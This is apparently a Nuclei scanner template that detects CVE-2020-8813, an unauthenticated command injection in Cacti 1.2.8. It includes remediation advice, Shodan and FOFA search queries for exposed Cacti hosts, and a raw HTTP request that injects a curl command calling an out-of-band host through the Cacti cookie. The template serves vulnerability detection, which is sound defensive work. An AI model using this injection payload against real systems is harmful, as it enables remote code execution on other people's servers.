id: CVE-2020-8813 info: name: Cacti v1.2.8 - Remote Code Execution author: gy741 severity: high description: Cacti v1.2.8 is susceptible to remote code execution. This vulnerability could be exploited without authentication if "Guest Realtime Graphs" privileges are enabled. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade to a patched version of Cacti v1.2.9 or later to mitigate this vulnerability. reference: - https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/ - https://github.com/Cacti/cacti/releases - https://gist.github.com/mhaskar/ebe6b74c32fd0f7e1eedf1aabfd44129 - https://drive.google.com/file/d/1A8hxTyk_NgSp04zPX-23nPbsSDeyDFio/view - https://nvd.nist.gov/vuln/detail/CVE-2020-8813 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-8813 cwe-id: CWE-78 epss-score: 0.95033 epss-percentile: 0.9913 cpe: cpe:2.3:a:cacti:cacti:1.2.8:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cacti product: cacti shodan-query: - http.title:"login to cacti" - http.title:"cacti" - http.favicon.hash:"-1797138069" fofa-query: - icon_hash="-1797138069" - title="cacti" - title="login to cacti" google-query: - intitle:"cacti" - intitle:"login to cacti" tags: cve2020,cve,cacti,rce,oast http: - raw: - | GET /graph_realtime.php?action=init HTTP/1.1 Host: {{Hostname}} Cookie: Cacti=%3Bcurl%20http%3A//{{interactsh-url}} matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - type: word part: interactsh_request words: - "User-Agent: curl" # digest: 4a0a00473045022100e81f669b103a63c658d1a86ead780d94d43b5d6ebf9f8c81e34035278897e3e8022021b83ecc964488a416f69dd934caeee92566d262ca5f009847ac680d14995597:922c64590222798bb761d5b6d8e72950